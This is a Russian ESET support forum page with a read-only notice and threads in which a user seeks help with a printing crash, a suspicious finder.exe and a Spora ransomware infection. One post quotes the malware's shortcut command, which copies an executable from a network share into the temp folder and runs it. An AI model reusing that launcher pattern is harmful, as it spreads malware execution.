Дорогие участники форума!

Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.

Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новые продукты компании PRO32.

PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Выбрать дату в календареВыбрать дату в календаре

[ Закрыто] Оишбка памяти 0x00000004, вылетает база при печати
Да нашел этот по этому пути - C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE11\FINDER.EXE
установлено порядка 5 принтеров, проверяли на двух только HP 3005 и HP 2055. При них совершался вылет из 1с8 и ошибка как на скриншоте. После чего перезагрузка графической оболочки explorer.
Изменено: nWc - 15.11.2017 16:08:48
[ Закрыто] Оишбка памяти 0x00000004, вылетает база при печати
Цитата
santy написал:
можете здесь еще проверить
https://www.hybrid-analysis.com/
https://www.hybrid-analysis.com/sample/cc782518a810c9f2c782a6f9e04dc2095b94ac028a962e163­0878749f0fff...
[ Закрыто] Оишбка памяти 0x00000004, вылетает база при печати
файл образ приложил
возникала ошибка при печати доков в 1с8, возможно что то поврежденно .
Нашел подозрителньый файл finder.exe на virus total показал заражение 1 из 66. Подскажите, опасный ли он? Так как признаков заражения не нашел. Началось вчера такое.
Изменено: nWc - 15.11.2017 13:18:30
зашифровано в Spora
скриншот сообщения от первого письма
http://joxi.ru/xAeYGNkuN3jPAy

есть ли возможность получить дешифратор?
Изменено: nWc - 10.03.2017 14:29:41
зашифровано в Spora
Цитата
santy написал:
файлы вирусов отправляем в [email protected] через специальную форму, на форуме не надо публиковать.
https://forum.esetnod32.ru/forum6/topic994/

файлик детектируется в ESET
 https://www.virustotal.com/en/file/09fabf74cfc942501d1ccebace1d3ef575a2265f3047381c­ ­3bbfb4c45892861a/analysis/  
я приложу сюда архивы, не знаю это может быть ключом или нет, если нет скажите плз  
зашифровано в Spora
Цитата
santy написал:
файлы вирусов отправляем в [email protected] через специальную форму, на форуме не надо публиковать.
https://forum.esetnod32.ru/forum6/topic994/

файлик детектируется в ESET
 https://www.virustotal.com/en/file/09fabf74cfc942501d1ccebace1d3ef575a2265f3047381c­ ­3bbfb4c45892861a/analysis/  
я нашел первоисточник, пришло письмо человек открыл его, далее там два файла один с html  страницей с предложением денег им дать за шасшифровку, второй  типо сверки эксель дока... Где можно найти key  
зашифровано в Spora
Цитата
santy написал:
nWc,
расшифровать файлы после шифрования Spora без приватного ключа не получится.
восстановление возможно только из бэкапов.
если необходима помощь в очистке систем, где произошло шифрование, добавьте образ автозапуска.
вот вирус  пароль на архив 123123, образ скину в ближайшее время
Изменено: nWc - 10.03.2017 13:29:50
зашифровано в Spora
появился троян в сети, заразил все документы на трех серверах
фотки, эксель , ворд, pdf и так далее...
Также скрывал каталоги и создавал ярлыки на вирус с путем вида:
C:\WINDOWS\system32\cmd.exe /c start explorer.exe "\\OPT\TEST15\070616" & type "\\OPT\TEST15\7f02a6b45084c26b98.exe" > "%temp%\7f02a6b45084c26b98.exe" && "%temp%\7f02a6b45084c26b98.exe"


вирус удален, но файлы не возможно открыть. Касперский который стоял на другом компе,  где не был Nod32, определил его как
Trojan-Rabsom.Win32.Spora.ccc

при попытке открыть любой док, пишет или поврежден или другой формат
Изменено: nWc - 10.03.2017 12:58:17
обнаружена троянская программа и вылетает переодически проводник, обнаружена троянская программа и вылетает переодически проводник
приложил лог, проблема не наблюдается
обнаружена троянская программа и вылетает переодически проводник, обнаружена троянская программа и вылетает переодически проводник
Цитата
santy написал:
Цитата
 nWc  написал:
Цитата
 santy  написал:
+
добавьте лог журнала обнаружения угроз,
  http://forum.esetnod32.ru/forum9/topic1408/  
есть чего нибудь? что за нехорошая редиска живет своей жизнью в компе?
нужен лог журнала обнаружения угроз,
вы же добавили логи сканирования.
логов нету , пусто там..